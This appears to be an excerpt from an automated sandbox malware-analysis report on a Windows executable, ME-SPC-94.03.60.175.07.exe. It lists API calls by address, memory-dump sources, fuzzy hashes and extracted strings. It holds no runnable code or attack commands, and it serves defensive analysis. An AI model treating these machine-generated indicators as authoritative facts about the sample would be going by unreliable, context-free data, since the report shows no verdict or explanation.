                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                  • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                  • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                  • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403F94), ref: 004041C6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                  • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                  • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                  • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                  • Instruction ID: 43bd389e684fdc992c114de42b340604c9c8a7aa9960d5983178e32e9e1c03f3
                                                  • Opcode Fuzzy Hash: 5231c911f6ab3084dc61dacf490c6499e9f2d5b92fa0196a3b0b3ed156b1a20b
                                                  • Instruction Fuzzy Hash: 42D0C9B7B141409BDB50EBB8AE8989B73A8E7913297204C73D942F20A1D178D8029A39
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                  • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                  • DeleteObject.GDI32(00000000), ref: 00404C64
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                  • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                  • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004050EF
                                                  • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                  • ShowWindow.USER32(00000000), ref: 0040514F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                  • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                  • Opcode Fuzzy Hash: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                  • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                  • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                  • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                  • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                    • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                    • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                  • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                  • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                  • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
                                                  • API String ID: 2246997448-1365839044
                                                  • Opcode ID: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                  • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                  • Opcode Fuzzy Hash: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                  • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                  • Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
                                                  • Opcode Fuzzy Hash: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                  • Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 004043D5
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404406
                                                  • GetSysColor.USER32(?), ref: 00404417
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                  • lstrlenW.KERNEL32(?), ref: 00404438
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                  • SendMessageW.USER32(00000000), ref: 004044BA
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                  • SetCursor.USER32(00000000), ref: 00404539
                                                  • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 0040454E
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                  • SetCursor.USER32(00000000), ref: 0040455D
                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 0040458C
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: Call$N$open
                                                  • API String ID: 3615053054-2563687911
                                                  • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                  • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                  • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                  • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                  APIs
                                                  • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,?,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405E0A,?,?,?,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                  • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                    • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                    • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                  • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                  • wsprintfA.USER32 ref: 00405CDE
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                    • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                    • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                  • API String ID: 1265525490-899692902
                                                  • Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                  • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                  • Opcode Fuzzy Hash: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                  • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                  • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                  • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                  • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                    • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID: @H3w
                                                  • API String ID: 4216380887-4275297014
                                                  • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                  • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                  • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                  • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                  • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                  • CharNextW.USER32(?,"C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                  • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 589700163-3552261379
